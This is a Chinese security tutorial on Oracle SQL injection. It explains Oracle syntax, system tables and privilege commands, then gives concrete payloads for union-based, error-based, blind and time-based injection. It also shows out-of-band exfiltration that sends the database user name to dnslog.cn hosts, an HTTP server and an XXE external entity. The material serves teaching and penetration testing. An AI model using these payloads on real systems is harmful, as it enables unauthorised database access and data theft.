网络安全进阶学习第十五课——Oracle SQL注入

news2024/12/24 20:33:26

文章目录

  • 一、Oracle数据库介绍
  • 二、Oracle和MySQL的语法差异:
  • 三、Oracle的数据库结构
  • 四、Oracle的重点系统表
  • 五、Oracle权限分类
    • 1、系统权限
    • 2、实体权限
    • 3、管理角色
  • 六、oracle常用信息查询方法
  • 七、联合查询注入
    • 1、order by 猜字段数量
    • 2、查数据库版本和用户名
    • 3、查当前数据库
    • 4、查表
    • 5、查字段
  • 八、报错注入
  • 九、盲注
    • 1、布尔盲注
    • 2、时间盲注
  • 十、带外OOB
    • 1、需要出外网HTTP
    • 2、dns解析带外
    • 3、SYS.DBMS_LDAP.INIT
    • 4、HTTPURITYPE
    • 5、Oracle XXE (CVE-2014-6577)


一、Oracle数据库介绍

Oracle数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。

Oracle服务默认端口:1521

Oracle和MySQL数据库语法大致相同,结构不太相同。最大的一个特点就是oracle可以调用Java代码。

Oracle要求select … from 后必须要有查询的表名


二、Oracle和MySQL的语法差异:

  1. Oracle要求select后必须指明要查询的表名,可以用dual。

  2. Oracle使用 || 拼接字符串,MySQL中为或运算。
    在这里插入图片描述

  3. 单引号和双引号在Oracle中虽然都是字符串,但是双引号可以用来消除关键字,比如sysdate。

  4. Oracle中limit应该使用虚表中的rownum字段通过where条件判断。
    在这里插入图片描述

  5. Oracle中没有空字符,'‘和’null’都是null,而MySQL中认为’'仍然是一个字符串。

  6. Oracle对数据格式要求严格,比如union select的时候


三、Oracle的数据库结构

对于“数据库”这个概念而言,Oracle采用了”表空间“的定义。数据文件就是由多个表空间组成的,这些数据文件和相关文件形成一个完整的数据库。

当数据库创建时,Oracle 会默认创建五个库:SYSTEM、SYSAUX、USERS、UNDOTBS、TEMP:

  1. SYSTEM:这个用于是存储系统表和管理配置等基本信息
  2. SYSAUX:类似于 SYSTEM,主要存放一些系统附加信息,以便减轻 SYSTEM 的空间负担
  3. UNDOTBS:用于事务回退等
  4. TEMP:作为缓存空间减少内存负担
  5. USERS:就是存储我们定义的表和数据

在Oracle中每个库中均存在一张dual表,这个表是虚表,并没有实际的存储意义,它永远只存储一条数据,因为Oracle的SQL语法要求select后必须跟上from,所以我们通常使用dual来作为计算、查询时间等SQL语句中from之后的虚表占位。举例:select 1+1 from dual。

Oracle要求select后必须指明要查询的表名,可以用dual。


四、Oracle的重点系统表

  • – dba_tables : 系统里所有的表的信息,需要DBA权限才能查询
  • – all_tables : 当前用户有权限的表的信息
  • – user_tables: 当前用户名下的表的信息
  • – DBA_ALL_TABLES:DBA 用户所拥有的或有访问权限的对象和表
  • – ALL_ALL_TABLES:某一用户拥有的或有访问权限的对象和表
  • – USER_ALL_TABLES:某一用户所拥有的对象和表

五、Oracle权限分类

在Oracle中,根据系统管理方式不同,将Oracle权限分为系统权限与实体权限两类。系统权限是指是否被授权用户可以连接到数据库上,在数据库中可以进行哪些系统操作。而实体权限是指用户对具体的模式实体(schema)所拥有的权限。

  • 系统权限:系统规定用户使用数据库的权限。(系统权限是对用户而言)。

  • 实体权限:某种权限用户对其它用户的表或视图的存取权限。(是针对表或视图而言的)。

1、系统权限

  • DBA:拥有全部特权,是系统最高权限,只有DBA才可以创建数据库结构。
  • RESOURCE:拥有Resource权限的用户只可以创建实体,不可以创建数据库结构。
  • CONNECT:拥有Connect权限的用户只可以登录Oracle,不可以创建实体,不可以创建数据库结构。

对于普通用户:授予connect, resource权限。

对于DBA管理用户:授予connect,resource, dba权限。

系统权限授权命令: 
系统权限只能由DBA用户授出:sys, system(最开始只能是这两个用户) 

授权命令:
SQL> grant connect, resource, dba to 用户名1 [,用户名2]; 
注:普通用户通过授权可以具有与system相同的用户权限,但永远不能达到与sys用户相同的权限,system用户的权限也可以被回收。 

例: 
SQL> connect system/manager SQL> Create user user50 identified by user50; SQL> grant connect, resource to user50;

查询用户拥有哪里权限: 
SQL> select from dba_role_privs; SQL> select from dba_sys_privs; SQL> select * from role_sys_privs;

查自己拥有哪些系统权限:
SQL> select * from session_privs;

删除用户:
SQL> drop user 用户名 cascade; //加上cascade则将用户连同其创建的东西全部删除

系统权限传递:增加WITH ADMIN OPTION选项,则得到的权限可以传递。 
SQL> grant connect, resorce to user50 with admin option; //可以传递所获权限。

系统权限回收:系统权限只能由DBA用户回收
SQL> Revoke connect, resource from user50;

说明: 
1)如果使用WITH ADMIN OPTION为某个用户授予系统权限,那么对于被这个用户授予相同权限的所有用户来说,取消该用户的系统权限并不会级联取消这些用户的相同权限。 
2)系统权限无级联,即A授予B权限,B授予C权限,如果A收回B的权限,C的权限不受影响;系统权限可以跨用户回收,即A可以直接收回C用户的权限。

2、实体权限

  • select, update, insert, alter, index, delete, all
    #all包括所有权限
  • execute
    #执行存储过程权限
user01: 
SQL> grant select, update, insert on product to user02; 
SQL> grant all on product to user02;

user02: 
SQL> select * from user01.product; 
// 此时user02查user_tables,不包括user01.product这个表,但如果查all_tables则可以查到,因为他可以访问。

将表的操作权限授予全体用户:
SQL> grant all on product to public; 
// public表示是所有的用户,这里的all权限不包括drop。

实体权限数据字典:
SQL> select owner, table_name from all_tables; // 用户可以查询的表 
SQL> select table_name from user_tables; // 用户创建的表 
SQL> select grantor, table_schema, table_name, privilege from all_tab_privs; // 获权可以存取的表(被授权的) 
SQL> select grantee, owner, table_name, privilege from user_tab_privs; // 授出权限的表(授出的权限)

DBA用户可以操作全体用户的任意基表(无需授权,包括删除):

DBA用户: 
SQL> Create table stud02.product( id number(10), name varchar2(20)); 
SQL> drop table stud02.emp;

SQL> create table stud02.employee as select * from scott.emp;

实体权限传递(with grant option):
user01: SQL> grant select, update on product to user02 with grant option; 
// user02得到权限,并可以传递。

实体权限回收:
user01: 
SQL>Revoke select, update on product from user02; 
//传递的权限将全部丢失。

说明:
如果取消某个用户的对象权限,那么对于这个用户使用WITH GRANT OPTION授予权限的用户来说,同样还会取消这些用户的相同权限,也就是说取消授权时级联的。

3、管理角色

建一个角色:
sql>create role role1;

授权给角色:
sql>grant create any table,create procedure to role1;

授予角色给用户:
sql>grant role1 to user1;

查看角色所包含的权限:
sql>select * from role_sys_privs;

创建带有口令以角色(在生效带有口令的角色时必须提供口令)sql>create role role1 identified by password1;

修改角色:是否需要口令
sql>alter role role1 not identified; 
sql>alter role role1 identified by password1;

设置当前用户要生效的角色 (注:角色的生效是一个什么概念呢?假设用户a有b1,b2,b3三个角色,
那么如果b1未生效,则b1所包含的权限对于a来讲是不拥有的,
只有角色生效了,角色内的权限才作用于用户,
最大可生效角色数由参数MAX_ENABLED_ROLES设定;
在用户登录后,oracle将所有直接赋给用户的权限和用户默认角色中的权限赋给用户。) 

sql>set role role1; //使role1生效 
sql>set role role,role2; //使role1,role2生效 
sql>set role role1 identified by password1; //使用带有口令的role1生效 
sql>set role all; //使用该用户的所有角色生效 
sql>set role none; //设置所有角色失效 
sql>set role all except role1; //除role1外的该用户的所有其它角色生效。 
sql>select * from SESSION_ROLES; //查看当前用户的生效的角色。

修改指定用户,设置其默认角色
sql>alter user user1 default role role1;
sql>alter user user1 default role all except role1;

删除角色 
sql>drop role role1;

角色删除后,原来拥用该角色的用户就不再拥有该角色了,相应的权限也就没有了。

说明: 
1)无法使用WITH GRANT OPTION为角色授予对象权限 
2)可以使用WITH ADMIN OPTION 为角色授予系统权限,取消时不是级联

六、oracle常用信息查询方法

1、获取数据库版本信息

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%25';

2、获取操作系统版本信息

SELECT banner FROM v$version WHERE banner LIKE 'TNS%25';

3、获取当前数据库

SELECT name FROM v$database;

4、获取数据库用户

SELECT user FROM dual;

5、获取所有数据库用户

SELECT username FROM all_users;
SELECT name FROM sys.user$; -- 需要高权限

6、获取当前用户权限

SELECT * FROM session_privs;

7、获取当前用户有权限的所有数据库

SELECT DISTINCT owner, table_name FROM all_tables;

8、获取表,all_tables类似于MySQL中的information_schema.tables

SELECT * FROM all_tables;

9、获取字段名

SELECT column_name FROM all_tab_columns;

10、在Oracle启动时,在 userenv 中存储了一些系统上下文信息,通过 SYS_CONTEXT 函数,我们可以取回相应的参数值。包括当前用户名等等。

SELECT SYS_CONTEXT('USERENV''SESSION_USER'from dual;

七、联合查询注入

1、order by 猜字段数量

union select进行查询,需要注意的是每一个字段都需要对应前面select的数据类型(字符串/数字)。所以我们一般先使用null字符占位,然后逐位判断每个字段的类型,举例:

?username=admin' union select null,null,null from dual --+ 正常
?username=admin' union select 1,null,null from dual --+ 正常说明第一个字段是数字型
?username=admin' union select 1,2,null from dual --+ 第二个字段为数字时错误
?username=admin' union select 1,'asd',null from dual --+ 正常,就为字符串 依此类推

2、查数据库版本和用户名

?username=admin' union select 1,(select user from dual),(SELECT banner FROM v$version where banner like 'Oracle%25') from dual --+

3、查当前数据库

?username=admin' union select 1,(SELECT global_name FROM global_name),null from dual --+

4、查表

wmsys.wm_concat()等同于MySQL中的group_concat(),在11gr2和12C上已经抛弃,可以用LISTAGG()替代

但是LISTAGG()返回的是varchar类型,如果数据表很多会出现字符串长度过长的问题。这个时候可以使用通过字符串截取来进行。

?username=admin' union select 1,(select LISTAGG(table_name,',')within group(order by owner)name from all_tables where owner='SYSTEM'),null from dual --+

5、查字段

?username=admin' union select 1,(select column_name from all_tab_columns where table_name='TEST' and rownum=2),null from dual --

八、报错注入

报错注入常用函数:
1、utl_inaddr.get_host_name

select utl_inaddr.get_host_name((select user from dual)) from dual;

11g之后,使用此函数的数据库用户需要有访问网络的权限

2、ctxsys.drithsx.sn

select ctxsys.drithsx.sn(1, (select user from dual)) from dual;

处理文本的函数,参数错误时会报错。

3、CTXSYS.CTX_REPORT.TOKEN_TYPE

select CTXSYS.CTX_REPORT.TOKEN_TYPE((select user from dual), '123') from dual;

4、XMLType

?username=admin' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --+

注意url编码,如果返回的数据有空格的话,它会自动截断,导致数据不完整,这种情况下先转为 hex,再导出。

5、dbms_xdb_version.checkin

select dbms_xdb_version.checkin((select user from dual)) from dual;

6、dbms_xdb_version.makeversioned

select dbms_xdb_version.makeversioned((select user from dual)) from dual;

7、dbms_xdb_version.uncheckout

select dbms_xdb_version.uncheckout((select user from dual)) from dual;

8、dbms_utility.sqlid_to_sqlhash

SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;

9、ordsys.ord_dicom.getmappingxpath

select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;

10、UTL_INADDR.get_host_name

select UTL_INADDR.get_host_name((select user from dual)) from dual;

11、UTL_INADDR.get_host_address

select UTL_INADDR.get_host_name('~'||(select user from dual)||'~') from dual;

九、盲注

1、布尔盲注

使用简单的字符串比较来进行,比如:

?username=admin' and (select substr(user, 1, 1) from dual)='S' --

通过decode配合除数为0来进行布尔盲注,比如:

?username=admin' and 1=(select decode(substr(user, 1, 1), 'S', (1/1),0) from dual) --+

2、时间盲注

时间延迟函数:DBMS_PIPE.RECEIVE_MESSAGE()函数
dbms_pipe.receive_message(‘RDS’, 10) #将为从RDS管道返回的数据等待10秒。

select 1 from dual where DBMS_PIPE.RECEIVE_MESSAGE('asd', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;

还可以配合decode:

select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',10),0) from dual;

十、带外OOB

类似于MySQL load_file的带外盲注。OOB 都需要发起网络请求的权限,有限制。

1、需要出外网HTTP

使用函数:utl_http.request()

select utl_http.request('http://localhost:8080/index?username=' || (select user from dual)) from dual;

2、dns解析带外

使用函数:utl_inaddr.get_host_address

select utl_inaddr.get_host_address((select user from dual)||'.cbb1ya.dnslog.cn') from dual;

3、SYS.DBMS_LDAP.INIT

SELECT DBMS_LDAP.INIT((select user from dual)||'.24wypw.dnslog.cn',80) FROM DUAL;

这个函数在 10g/11g 中是 public 权限

4、HTTPURITYPE

SELECT HTTPURITYPE((select user from dual)||'.24wypw.dnslog.cn').GETCLOB() FROM DUAL;

5、Oracle XXE (CVE-2014-6577)

说是xxe,实际上应该算是利用xml的加载外部文档来进行数据带外。支持http和ftp

  1. http
select 1 from dual where 1=(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.124.1/'||(SELECT user from dual)||'"> %remote;]>'),'/l') from dual); 
  1. ftp
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://'||user||':bar@IP/test"> %remote; %param1;]>'),'/l') from dual;

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/847061.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MySQL之深入InnoDB存储引擎——redo日志

文章目录 一、为什么需要redo日志二、redo日志的类型1&#xff09;简单的redo日志类型2&#xff09;复杂的redo日志类型 三、Mini-Transaction四、redo日志的写入过程五、redo日志文件1、刷盘时机2、redo日志文件组 六、log sequence number1、lsn的引入2、flushed_to_disk_lsn…

MQTT消息传输过程,网络断开后,断线重连及订阅消息恢复

1&#xff0c;首先要在网络失败的地方进行client重连 2&#xff0c;一定要设置发送超时&#xff0c;默认是-1&#xff0c;是不断进行发送的&#xff0c;会被长阻塞在这里&#xff0c;单位是ms 3&#xff0c;参考链接 https://vimsky.com/examples/detail/java-method-org.ec…

实现 cpolar 内网穿透

简介 cpolar是一种安全的内网穿透云服务&#xff0c;可以将内网下的本地服务器通过安全隧道暴露至公网&#xff0c;使得公网用户可以正常访问内网服务。它是一款内网穿透软件&#xff0c;使用简单&#xff0c;只需一行命令即可将内网站点发布至公网&#xff0c;方便给客户演示…

【100天精通python】Day29:文件与IO操作_JSON文件处理

目录 专栏导读 一、XML文件概述 1. 标签和元素 2. 嵌套结构 3. 属性 4. 命名空间 5. CDATA节 6. 注释 7. 验证与验证语言 8. 扩展性 二、XML文件处理常见操作 1. 解析XML文件 2. 创建和编辑XML文件 3. 修改XML文件 4. 查询XML元素 5 遍历XML元素 6. 删除XML元…

嵌入式虚拟仿真实验教学平台之串口发送数据

嵌入式虚拟仿真实验教学平台课程系列 串口发送数据实验 课程内容 本实验使用 STM32 的串口发送数据。开始仿真后,打开串口监视器&#xff0c;串口监视器会打印出要发送的数据。 课程目标 学习配置使用GPIO功能学习配置使用复用功能学习配置使用UART功能 硬件设计 本课程…

扩散模型(DDPM)介绍

文章目录 扩散模型扩散过程前向过程逆向过程 网络结构 文章主要介绍了DDPM扩散模型&#xff0c;包含了详细的数学推导&#xff0c;可能公式有点多&#xff0c;但是只要能够耐心看完&#xff0c;相信会有一些收获的。好了下面进入正题。 扩散模型 扩散模型是一种新的生成模型&a…

FPGA纯verilog实现 LZMA 数据压缩,提供工程源码和技术支持

目录 1、前言2、我这儿已有的FPGA压缩算法方案3、FPGA LZMA数据压缩功能和性能4、FPGA LZMA 数据压缩设计方案输入输出接口描述数据处理流程LZ检索器数据同步LZMA 压缩器 为输出LZMA压缩流添加文件头 5、vivado仿真6、福利&#xff1a;工程代码的获取 1、前言 说到FPGA的应用&…

stm32项目(4)——基于stm32的厨房安全检测系统

目录 1.功能介绍 2.硬件方案 1.单片机的选择 2.显示屏的选择 3.温湿度传感器 4.烟雾传感器 5.甲醛传感器 6.排气风扇 3.程序设计 1.接线方式 2.大致思路 1.功能介绍 本次设计的厨房安全检测系统的功能如下&#xff1a; 利用单片机、烟雾传感器、甲醛传感器、温湿度传感器…

LeetCode-Java(03)

9. 回文数 class Solution {public boolean isPalindrome(int x) {if (x < 0 || (x % 10 0 && x ! 0)) {return false;}int revertedNumber 0;while (x > revertedNumber) {revertedNumber revertedNumber * 10 x % 10;x / 10;}// 当长度为奇数时通过reverte…

现代C++中的从头开始深度学习:【5/8】卷积

一、说明 在上一个故事中&#xff0c;我们介绍了机器学习的一些最相关的编码方面&#xff0c;例如 functional 规划、矢量化和线性代数规划。 现在&#xff0c;让我们通过使用 2D 卷积实现实际编码深度学习模型来开始我们的道路。让我们开始吧。 二、关于本系列 我们将学习如何…

【从零学习python 】04. Python编程基础:变量、数据类型与标识符

文章目录 变量以及数据类型一、变量的定义二、变量的类型三、查看数据类型 标识符和关键字标识符命名规则命名规范 关键字进阶案例 变量以及数据类型 一、变量的定义 对于重复使用&#xff0c;并且经常需要修改的数据&#xff0c;可以定义为变量&#xff0c;来提高编程效率。…

kubeasz在线安装K8S集群单master

1.基础系统配置 确保在干净的系统上开始安装&#xff0c;不能使用曾经装过kubeadm或其他k8s发行版的环境 系统是Ubuntu 或者CentOS 7 2.下载文件 2.1 下载工具脚本ezdown&#xff0c;举例使用kubeasz版本3.5.0 #此版本默认安装的是 K8S v1.26.0 export release3.5.0 wget h…

初遇C++之语法篇(完结)

&#x1f9c3;博客主页:阿博历练记 &#x1f4d6;文章专栏:c &#x1f68d;代码仓库:阿博编程日记 &#x1f361;欢迎关注:欢迎友友们点赞收藏关注哦&#x1f339; 文章目录 &#x1f36d;1.函数重载&#x1f4dc;1.1函数重载的概念&#x1f4e2;1.2函数重载三大误区&#x1f3…

Nacos单节点部署

&#x1f388; 作者&#xff1a;互联网-小啊宇 &#x1f388; 简介&#xff1a; CSDN 运维领域创作者、阿里云专家博主。目前从事 Kubernetes运维相关工作&#xff0c;擅长Linux系统运维、开源监控软件维护、Kubernetes容器技术、CI/CD持续集成、自动化运维、开源软件部署维护…

第十五章 定义 HL7 的 DTL 数据转换

文章目录 第十五章 定义 HL7 的 DTL 数据转换 第十五章 定义 HL7 的 DTL 数据转换 每个接口可能需要一定数量的数据转换。创建转换时&#xff0c;不要使用保留的包名称。 重要提示&#xff1a;请勿在数据转换中手动更改 HL7 转义序列&#xff1b;自动处理这些。 可以使用“数…

智能状态监测如何帮助设备管理团队转型升级?

制造业面临人才短缺和生产力提升的双重挑战。然而&#xff0c;全球市场对生产效率和产品质量的要求依然高企。这些挑战的核心在于&#xff0c;制造业需要在日益复杂的环境下&#xff0c;实时识别并应对生产过程中的异常情况&#xff0c;确保生产持续稳定。 一、传统状态监测的限…

Android 13 Hotseat定制化修改

一.背景 由于需求是需要自定义修改Hotseat,所以此篇文章是记录如何自定义修改hotseat的,应该可以覆盖大部分场景,修改点有修改hotseat布局方向,hotseat图标数量,hotseat图标大小,hotseat布局位置,hotseat图标禁止形成文件夹,hotseat图标禁止移动到Launcher中,下面开始…

深度学习中的优化算法

文章目录 前言一、优化和深度学习1.1 优化的目标1.2 深度学习中的优化挑战1.2.1 局部最小值1.2.2 鞍点1.2.3 梯度消失 二、梯度下降2.1 一维梯度下降2.1.1 学习率 2.2 多元梯度下降2.3 自适应方法2.3.1 牛顿法2.3.2 其他自适应方法 三、随机梯度下降3.1 随机梯度更新3.2 动态学…

JS逆向之顶像滑块

本教程仅限于学术探讨&#xff0c;也没有专门针对某个网站而编写&#xff0c;禁止用于非法用途、商业活动、恶意滥用技术等&#xff0c;否则后果自负。观看则同意此约定。如有侵权&#xff0c;请告知删除&#xff0c;谢谢&#xff01; 目录 一、接口请求流程 二、C1包 三、ac 四…